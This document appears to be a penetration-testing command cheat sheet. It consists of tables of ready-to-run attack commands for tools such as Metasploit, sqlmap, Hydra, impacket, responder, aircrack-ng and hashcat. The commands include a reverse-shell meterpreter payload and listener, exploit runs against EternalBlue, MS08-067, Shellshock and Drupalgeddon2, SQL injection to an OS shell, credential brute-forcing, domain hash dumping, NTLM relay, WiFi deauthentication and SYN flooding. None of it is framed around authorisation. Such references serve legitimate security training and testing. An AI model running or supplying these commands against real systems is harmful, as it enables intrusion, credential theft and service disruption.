Guide of Penetration Testing Commands

Prepared by Mohammed AlSubayt

Table of Contents

Nmap Commands 2

Metasploit Commands 4

Nikto Commands 6

Sqlmap Commands 7

Hydra Commands 8

John the Ripper Commands 10

Aircrack-ng Commands 11

Wireshark and Tshark Commands 12

Other Commands 13
Nmap Commands

No. | Command | Explanation
1 | nmap -sP 192.168.1.0/24 | Scan the network to discover active devices.
2 | nmap -sS 192.168.1.1 | Perform a TCP SYN scan to detect open ports on the device.
3 | nmap -sV 192.168.1.1 | Detect the versions of services running on open ports.
4 | nmap -O 192.168.1.1 | Determine the operating system used on the device.
5 | nmap -A 192.168.1.1 | Comprehensive scan including open ports, service versions, and OS detection.
6 | nmap -Pn 192.168.1.1 | Scan devices even if they do not respond to ping requests.
7 | nmap -sU 192.168.1.1 | Scan for open UDP ports.
8 | nmap -p- 192.168.1.1 | Scan all ports (1-65535) instead of just the default ports.
9 | nmap --script vuln 192.168.1.1 | Use scripts to check for vulnerabilities.
10 | nmap --script smb-enum-shares -p 445 192.168.1.1 | Enumerate SMB shares using an Nmap script.
11 | nmap --script http-enum -p 80 192.168.1.1 | Enumerate web server directories using an Nmap script.
12 | nmap --script smb-vuln-ms17-010 192.168.1.1 | Check for the MS17-010 (EternalBlue) vulnerability.
13 | nmap --script smb-vuln-cve-2017-7494 192.168.1.1 | Check for the CVE-2017-7494 (SambaCry) vulnerability.
14 | nmap --script smb-vuln-ms08-067 192.168.1.1 | Check for the MS08-067 vulnerability.
15 | nmap --script smb-vuln-ms10-061 192.168.1.1 | Check for the MS10-061 (Print Spooler) vulnerability.
16 | nmap --script smb-vuln-regsvc-dos 192.168.1.1 | Check for the registry service DoS vulnerability.
17 | nmap --script http-sql-injection --script-args='http-sql-injection.args' -p 80 192.168.1.1 | Check for SQL injection vulnerabilities using an Nmap script.
18 | nmap -sL 192.168.1.0/24 | List all IPs in the subnet without scanning them.
19 | nmap -p80 --script http-methods 192.168.1.1 | Discover allowed HTTP methods on a web server.
20 | nmap -p80 --script http-title 192.168.1.1 | Retrieve the title of the web page.
21 | nmap -p80 --script http-headers 192.168.1.1 | Retrieve HTTP headers from the server.
22 | nmap -p80 --script http-enum 192.168.1.1 | Enumerate common web applications on the server.
23 | nmap -p80 --script http-auth 192.168.1.1 | Test for HTTP authentication methods.
24 | nmap -sX 192.168.1.1 | Xmas scan to detect open ports.
25 | nmap -sA 192.168.1.1 | ACK scan to map firewall rulesets.
26 | nmap -sW 192.168.1.1 | Window scan to detect open ports based on TCP window size.
27 | nmap -sM 192.168.1.1 | Maimon scan to detect open ports using the FIN/ACK flag combination.
28 | nmap -p80 --script http-userdir-enum 192.168.1.1 | Enumerate user directories on a web server.
29 | nmap -p80 --script http-passwd 192.168.1.1 | Check for the /etc/passwd file on a web server.
30 | nmap -p80 --script http-robots.txt 192.168.1.1 | Retrieve and analyze the robots.txt file.
31 | nmap --script ssh-brute -p 22 192.168.1.1 | Brute-force SSH login using an Nmap script.
32 | nmap --script ftp-anon 192.168.1.1 | Check for anonymous FTP login.
33 | nmap --script ftp-vsftpd-backdoor 192.168.1.1 | Check for the vsftpd backdoor vulnerability.
35 | nmap --script http-phpself-xss 192.168.1.1 | Check for PHP_SELF XSS vulnerabilities.
36 | nmap --script dns-brute 192.168.1.1 | Perform DNS brute-force enumeration.
37 | nmap -p 22 --script ssh-hostkey 192.168.1.1 | Retrieve SSH host keys.
38 | nmap -p 53 --script dns-recursion 192.168.1.1 | Check for DNS recursion.
39 | nmap --traceroute 192.168.1.1 | Perform a traceroute along with the scan.
40 | nmap -sn 192.168.1.0/24 | Ping scan to discover live hosts without port scanning.
Metasploit Commands

No. | Command | Explanation
1 | metasploit | Launch the Metasploit framework for exploit development and execution.
2 | msfconsole | Open the Metasploit console interface.
3 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe | Generate a Metasploit payload.
4 | msfconsole -r script.rc | Run Metasploit commands from a script file.
5 | msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit" | Exploit the EternalBlue vulnerability.
6 | msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit" | Set up and run a multi-handler for reverse TCP payloads.
7 | msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit" | Exploit SMB with psexec.
8 | msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; set THREADS 10; run" | TCP port scan using Metasploit.
9 | msfconsole -x "use auxiliary/scanner/http/http_version; set RHOSTS 192.168.1.0/24; run" | Scan HTTP versions on a network.
10 | msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE /path/to/passwords.txt; run" | Brute-force FTP login.
11 | msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE /path/to/passwords.txt; run" | Brute-force SSH login.
12 | msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run" | Scan SMB versions on a network.
13 | msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run" | Enumerate SMB shares on a network.
14 | msfconsole -x "use auxiliary/scanner/smb/smb_enumusers; set RHOSTS 192.168.1.0/24; run" | Enumerate SMB users on a network.
15 | msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run" | Scan for RDP services on a network.
16 | msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit" | Exploit the MS08-067 vulnerability.
17 | msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit" | Exploit the vsftpd 2.3.4 backdoor.
18 | msfconsole -x "use exploit/windows/dcerpc/ms03_026_dcom; set RHOST 192.168.1.1; exploit" | Exploit the MS03-026 vulnerability.
19 | msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit" | Execute commands on Windows via SMB and psexec.
20 | msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit" | Exploit the Shellshock vulnerability.
22 | msfconsole -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST 192.168.1.1; exploit" | Exploit Struts2 Content-Type OGNL injection.
23 | msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit" | Exploit the Drupalgeddon2 vulnerability.
24 | msfconsole -x "use exploit/multi/php/php_cgi_arg_injection; set RHOST 192.168.1.1; exploit" | Exploit PHP CGI argument injection.
25 | msfconsole -x "use exploit/windows/browser/ms14_064_ole_code_execution; set RHOST 192.168.1.1; exploit" | Exploit MS14-064 OLE code execution.
Nikto Commands

No. | Command | Explanation
1 | nikto -h http://192.168.1.1 | Scan web servers to detect vulnerabilities.
2 | nikto -h http://192.168.1.1 -Plugins | Run specific plugins for detailed scanning.
3 | nikto -h http://192.168.1.1 -C all | Comprehensive web server scan with all tests.
4 | nikto -h http://192.168.1.1 -Tuning 1 | Tune the scan to only check for interesting files.
5 | nikto -h http://192.168.1.1 -Format msf+ | Export vulnerabilities to Metasploit.
6 | nikto -h http://192.168.1.1 -Plugins robots | Check for robots.txt vulnerabilities.
7 | nikto -h http://192.168.1.1 -Plugins fileupload | Check for file upload vulnerabilities.
8 | nikto -h http://192.168.1.1 -Plugins shellshock | Check for the Shellshock vulnerability.
9 | nikto -h http://192.168.1.1 -Plugins heartbleed | Check for the Heartbleed vulnerability.
10 | nikto -h http://192.168.1.1 -Plugins poodle | Check for the POODLE vulnerability.
11 | nikto -h http://192.168.1.1 -output report.html | Generate a vulnerability report for a web server.
12 | nikto -h http://192.168.1.1 -Plugins cgi | Check for CGI vulnerabilities.
13 | nikto -h http://192.168.1.1 -Plugins apache | Check for Apache-specific vulnerabilities.
14 | nikto -h http://192.168.1.1 -Plugins iis | Check for IIS-specific vulnerabilities.
15 | nikto -h http://192.168.1.1 -Plugins horde | Check for Horde-specific vulnerabilities.
16 | nikto -h http://192.168.1.1 -Plugins nessus | Check for Nessus compatibility.
17 | nikto -h http://192.168.1.1 -Plugins php | Check for PHP-specific vulnerabilities.
18 | nikto -h http://192.168.1.1 -Plugins ssl | Check for SSL/TLS-specific vulnerabilities.
19 | nikto -h http://192.168.1.1 -Plugins generic | Run generic tests for common vulnerabilities.
20 | nikto -h http://192.168.1.1 -Plugins msf | Check for Metasploit integration.
21 | nikto -h http://192.168.1.1 -Plugins tomcat | Check for Tomcat-specific vulnerabilities.
Sqlmap Commands

No. | Command | Explanation
1 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --dbs | Detect and exploit SQL injection vulnerabilities.
2 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --dump | Dump the database content after finding SQL injection.
3 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --os-shell | Obtain an OS shell through SQL injection.
4 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --tamper=space2comment | Bypass a WAF by using tamper scripts.
5 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --hex | Use hexadecimal encoding for payloads.
6 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --dbms=mysql | Specify the DBMS to use specific payloads.
7 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --privileges | Retrieve the DBMS user privileges.
8 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --level=5 --risk=3 | Advanced SQL injection testing with high risk and level.
9 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --passwords | Retrieve DBMS password hashes.
10 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --roles | Retrieve DBMS roles.
11 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --schema | Retrieve the DBMS schema.
12 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --count | Count the number of entries in tables.
13 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --search -T users --string="admin" | Search for specific strings in the database.
14 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --batch | Run sqlmap in non-interactive mode.
15 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --delay=5 | Add a delay between each request.
16 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --timeout=10 | Set a timeout for each request.
17 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --retries=3 | Set the number of retries for each request.
18 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --tor | Use the Tor network for anonymity.
19 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --check-tor | Check if the Tor network is used correctly.
20 | sqlmap -u "http://192.168.1.1/vuln.php?id=1" --proxy=http://127.0.0.1:8080 | Use a proxy for requests.
Hydra Commands

No. | Command | Explanation
1 | hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh | Brute-force SSH login using a password list.
2 | hydra -l admin -P /path/to/passwords.txt -s 2222 ssh://192.168.1.1 | Brute-force SSH on a non-standard port.
3 | hydra -l admin -P /path/to/passwords.txt http-get://192.168.1.1 | Brute-force HTTP GET authentication.
4 | hydra -l admin -P /path/to/passwords.txt http-post-form://192.168.1.1/login.php | Brute-force an HTTP POST login form.
5 | hydra -L users.txt -P passwords.txt 192.168.1.1 ssh | Brute-force SSH with multiple usernames.
6 | hydra -L users.txt -P passwords.txt smb://192.168.1.1 | Brute-force SMB authentication.
7 | hydra -l admin -P /path/to/passwords.txt ftp://192.168.1.1 | Brute-force FTP login.
8 | hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh | Brute-force SSH login using Hydra.
9 | hydra -l admin -P /path/to/passwords.txt http-get://192.168.1.1/login.php | Brute-force an HTTP GET login form.
11 | hydra -l admin -P /path/to/passwords.txt -e nsr 192.168.1.1 ssh | Brute-force SSH with null/single/reverse password guesses.
12 | hydra -l admin -P /path/to/passwords.txt -t 4 192.168.1.1 ssh | Set the number of parallel connections to 4 for SSH brute-forcing.
13 | hydra -L users.txt -P passwords.txt http-get://192.168.1.1 | Brute-force HTTP GET login with multiple usernames.
14 | hydra -L users.txt -P passwords.txt http-post-form://192.168.1.1/login.php | Brute-force HTTP POST login with multiple usernames.
15 | hydra -l admin -P /path/to/passwords.txt -f 192.168.1.1 ssh | Stop after the first found password for SSH.
16 | hydra -l admin -P /path/to/passwords.txt -s 21 192.168.1.1 ftp | Brute-force FTP login on port 21.
17 | hydra -L users.txt -P passwords.txt -o results.txt 192.168.1.1 ssh | Save results to a file.
18 | hydra -l admin -P /path/to/passwords.txt -V 192.168.1.1 ssh | Verbose mode to show each attempt.
19 | hydra -l admin -P /path/to/passwords.txt -M targets.txt ssh | Brute-force SSH on multiple targets listed in a file.
20 | hydra -l admin -P /path/to/passwords.txt -R | Restore a previous session.
John the Ripper Commands

No. | Command | Explanation
1 | john /path/to/hashfile | Crack password hashes using John the Ripper.
2 | john --wordlist=/path/to/wordlist /path/to/hashfile | Password cracking using a wordlist.
3 | john --format=NT /path/to/hashfile | Crack NTLM password hashes.
4 | john --rules --wordlist=/path/to/wordlist /path/to/hashfile | Use a wordlist and apply rules for password cracking.
5 | john --show /path/to/hashfile | Show cracked passwords from the hash file.
6 | john --format=raw-md5 /path/to/hashfile | Crack raw MD5 password hashes.
7 | john --incremental /path/to/hashfile | Use incremental mode for password cracking.
8 | john --single /path/to/hashfile | Use single crack mode for password cracking.
9 | john --wordlist=/path/to/wordlist --rules /path/to/hashfile | Use a wordlist with rules for password cracking.
10 | john --session=custom_session /path/to/hashfile | Save the cracking session with a custom name.
11 | john --restore=custom_session | Restore a saved cracking session.
12 | john --status=custom_session | Show the status of a cracking session.
13 | john --pot=/path/to/potfile /path/to/hashfile | Specify a custom pot file for cracked passwords.
14 | john --nolog /path/to/hashfile | Disable logging.
Aircrack-ng Commands

No. | Command | Explanation
1 | aircrack-ng -a2 -b [BSSID] -w /path/to/wordlist.cap | Crack WPA/WPA2-PSK passwords.
2 | aircrack-ng -e SSID -w /path/to/wordlist /path/to/capture.cap | Crack a WPA handshake with a specific SSID.
3 | airodump-ng wlan0 | Capture packets and display wireless networks.
4 | aireplay-ng -0 10 -a [BSSID] wlan0 | Deauthenticate clients to capture handshakes.
5 | airodump-ng -c 6 --bssid [BSSID] -w capture wlan0 | Capture packets on a specific channel and BSSID.
6 | aircrack-ng -z /path/to/capture.cap | Use the PTW attack against WEP.
7 | aircrack-ng -k 1 /path/to/capture.cap | Use the KoreK attack against WEP.
8 | airodump-ng --band abg wlan0 | Capture packets on all wireless bands (a, b, g).
9 | aireplay-ng -3 -b [BSSID] wlan0 | Perform an ARP replay attack to generate traffic.
10 | aireplay-ng -9 wlan0 | Perform an injection test to check if the card supports injection.
11 | aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC] wlan0 | Fake authentication attack to associate with the AP.
12 | aireplay-ng -2 -r /path/to/arp-request wlan0 | Interactive packet replay attack.
13 | airodump-ng --write /path/to/output wlan0 | Write captured packets to a file.
14 | airbase-ng -e "Free WiFi" -c 6 wlan0 | Create a fake access point.
15 | airdecap-ng -e [SSID] /path/to/capture.cap | Decrypt WEP/WPA packets with a known key.
Wireshark and Tshark Commands

No. | Command | Explanation
1 | wireshark | Network protocol analyzer for graphical packet capture and analysis.
2 | tshark -i eth0 | Command-line version of Wireshark, capturing on interface eth0.
3 | tcpdump -i eth0 | Capture network traffic on interface eth0.
4 | tcpdump -i eth0 port 80 | Capture network traffic on port 80.
5 | tcpdump -i eth0 -w capture.pcap | Capture network traffic and save it to a file.
6 | tshark -r capture.pcap | Read and analyze a pcap file.
Other Commands

No. | Command | Explanation
1 | burpsuite | Launch Burp Suite for web application security testing.
2 | zaproxy | Launch OWASP ZAP for web application security testing.
3 | dirb http://192.168.1.1 /path/to/wordlist | Directory brute-forcing to discover hidden files and directories.
4 | gobuster dir -u http://192.168.1.1 -w /path/to/wordlist | Directory brute-forcing using Gobuster.
5 | wfuzz -c -z file,/path/to/wordlist -u http://192.168.1.1/FUZZ | Fuzzing tool for web application testing.
6 | ffuf -w /path/to/wordlist -u http://192.168.1.1/FUZZ | Fast web fuzzer for discovering hidden files and directories.
7 | hping3 -S -p 80 -c 1 192.168.1.1 | Send a single SYN packet to test if port 80 is open.
8 | dnsenum example.com | DNS enumeration to gather information about a domain.
9 | theHarvester -d example.com -l 500 -b google | Gather emails, subdomains, and other information from search engines.
10 | maltego | Open-source intelligence (OSINT) and forensics application.
11 | recon-ng | Web reconnaissance framework for OSINT gathering.
12 | crackmapexec smb 192.168.1.1 -u user -p password --shares | Enumerate SMB shares with credentials.
13 | crackmapexec smb 192.168.1.1 -u user -p password --exec 'cmd.exe /c whoami' | Execute commands on the target via SMB.
14 | responder -I eth0 | Network poisoning tool to capture SMB/NTLM hashes.
15 | ntlmrelayx.py -smb2support -i | Relay captured NTLM hashes to an SMB service.
16 | smbrelayx.py -h 192.168.1.1 -c "whoami" | Relay NTLM hashes to execute commands on the target.
17 | responder -I eth0 -w | Run Responder in full analysis mode.
18 | hashcat -a 0 -m 0 /path/to/hashfile /path/to/wordlist | High-performance password cracking.
19 | hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a | Mask attack with brute-force for passwords of length 6.
20 | hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l | Mask attack with lowercase letters for NTLM hashes.
21 | hashcat -a 0 -m 1800 /path/to/hashfile /path/to/wordlist | Dictionary attack on SHA-512 hashes.
22 | hashcat -a 1 -m 0 /path/to/hashfile /path/to/wordlist /path/to/rules | Combinator attack using two wordlists.
23 | hashcat -a 6 -m 0 /path/to/hashfile /path/to/wordlist ?d?d | Hybrid attack with a dictionary and a 2-digit suffix.
24 | hcxdumptool -i wlan0 -o capture.pcapng --enable_status=1 | Capture handshakes and PMKID for WPA cracking.
25 | hcxtools -m /path/to/pmkid /path/to/capture.pcapng | Extract the PMKID from the capture file.
26 | reaver -i wlan0 -b [BSSID] -vv | Perform a brute-force attack on the WPS PIN.
27 | wifite | Automated wireless attack tool to crack WEP/WPA/WPA2.
28 | legion | Automated network penetration testing framework.
29 | patator | Multi-purpose brute-forcer and enumerator.
30 | medusa -h 192.168.1.1 -u admin -P /path/to/passwords.txt -M ssh | Brute-force SSH login using Medusa.
31 | bloodhound-python -d example.com -u user -p password -c all | Active Directory enumeration tool.
32 | impacket-getTGT user -dc-ip 192.168.1.1 | Get a Kerberos TGT using Impacket.
33 | impacket-secretsdump -just-dc-ntlm 192.168.1.1 | Dump NTLM hashes from a domain controller.
34 | impacket-psexec -target 192.168.1.1 -u user -p password | Remote command execution via SMB.
35 | impacket-wmiexec -target 192.168.1.1 -u user -p password | Remote command execution via WMI.
36 | impacket-smbexec -target 192.168.1.1 -u user -p password | Remote command execution via SMB.
37 | sslscan 192.168.1.1 | SSL/TLS scanner to detect supported protocols and ciphers.
38 | sslyze --regular 192.168.1.1 | SSL/TLS configuration scanner.
39 | openssl s_client -connect 192.168.1.1:443 | Test an SSL/TLS connection to a server.
40 | testssl.sh 192.168.1.1 | Test SSL/TLS security on a server.
41 | curl -I http://192.168.1.1 | Fetch HTTP headers to gather information about the server.
42 | curl -X POST -d "username=admin&password=1234" http://192.168.1.1/login.php | Send an HTTP POST request to a login form.
43 | curl -O http://192.168.1.1/file.txt | Download a file from a web server.
44 | curl -H "User-Agent: Mozilla/5.0" http://192.168.1.1 | Send a request with a custom User-Agent header.
45 | curl -k https://192.168.1.1 | Ignore SSL certificate errors.
48 | wfuzz -c -z file,/path/to/wordlist -u http://192.168.1.1/FUZZ | Fuzzing tool to discover hidden files or directories.
50 | wfuzz -c -z file,/path/to/wordlist -b "cookie=SESSIONID" -u http://192.168.1.1/FUZZ | Fuzz URLs with session cookies.
51 | zap-baseline.py -t http://192.168.1.1 | Automated scan using the OWASP ZAP baseline scan.
52 | droopescan scan drupal -u http://192.168.1.1 | Scan a Drupal CMS for vulnerabilities.
53 | joomscan --url http://192.168.1.1 | Scan a Joomla CMS for vulnerabilities.
54 | wpscan --url http://192.168.1.1 --enumerate u | Enumerate WordPress users.
55 | wpscan --url http://192.168.1.1 --plugins-detection mixed | Detect WordPress plugins.
56 | searchsploit | Search for exploit code using Exploit-DB.
57 | searchsploit -m 12345 | Mirror an exploit to the current directory.
58 | ike-scan 192.168.1.1 | Scan and identify IKE VPN servers.
59 | yersinia | Network attack tool for Layer 2 protocols.
60 | mitmf | Man-in-the-middle framework for network attacks.
61 | setoolkit | Social engineering toolkit for phishing and other attacks.
62 | beef | Browser Exploitation Framework for client-side attacks.
63 | netcat -nv 192.168.1.1 80 | Simple TCP connection to test a specific port.
64 | netcat -lvp 4444 | Listen for incoming connections on port 4444.
65 | netcat -zv 192.168.1.1 1-65535 | Scan all ports using Netcat.
66 | smbclient -L //192.168.1.1 -U username | List SMB shares on a remote server.
67 | smbmap -H 192.168.1.1 -u username -p password | Enumerate SMB shares and permissions.
68 | impacket-smbclient //192.168.1.1/share -user username | SMB client from the Impacket toolkit.
69 | ldapsearch -h 192.168.1.1 -x -b "dc=example,dc=com" | LDAP enumeration.
70 | cewl http://192.168.1.1 -w wordlist.txt | Generate a custom wordlist from a website.
71 | wfuzz -c -z file,/path/to/wordlist -u http://192.168.1.1/FUZZ | Fuzz URLs for hidden files and directories.
72 | dnsenum example.com | DNS enumeration tool for finding subdomains.
73 | dnsrecon -d example.com -t brt -D /path/to/wordlist.txt | Brute-force DNS subdomains.
74 | dnsenum --enum example.com | Comprehensive DNS enumeration.
75 | dnsmap example.com | DNS mapping and subdomain discovery tool.
76 | masscan -p1-65535 192.168.1.1 | Fast port scanner for large networks.
77 | zmap -p 80 192.168.1.0/24 | Fast network scanner focused on speed.
78 | recon-ng | Web reconnaissance framework for information gathering.
79 | fping -a -g 192.168.1.0/24 | Ping sweep to discover live hosts.
80 | hping3 -1 192.168.1.1 | Send an ICMP echo request to test connectivity.
81 | hping3 -S 192.168.1.1 -p 80 | Send a TCP SYN packet to test if port 80 is open.
82 | hping3 -A 192.168.1.1 -p 80 | Send a TCP ACK packet to test if port 80 is open.
83 | hping3 -2 192.168.1.1 -p 53 | Send a UDP packet to test if port 53 is open.
84 | hping3 -8 80 -c 1000 -S 192.168.1.1 | Send 1000 SYN packets to port 80 to test for SYN flood.
85 | hping3 -Q -p 80 -s 192.168.1.1 | Sequence number analysis for TCP ports.
87 | hping3 --flood -V -p 80 192.168.1.1 | Send continuous SYN packets to flood a specific port.
88 | masscan -p80,443 192.168.1.0/24 | Fast port scanner for large networks.
90 | whois example.com | Retrieve domain registration information.
91 | dig example.com any | Retrieve DNS records for a domain.
92 | nslookup example.com | Retrieve DNS records using nslookup.
93 | fierce -dns example.com | DNS reconnaissance and enumeration tool.
94 | dmitry -winsepfb http://192.168.1.1 | Deepmagic Information Gathering Tool.
96 | maltego | Open-source intelligence and forensics application.
97 | spiderfoot | Automate OSINT gathering and analysis.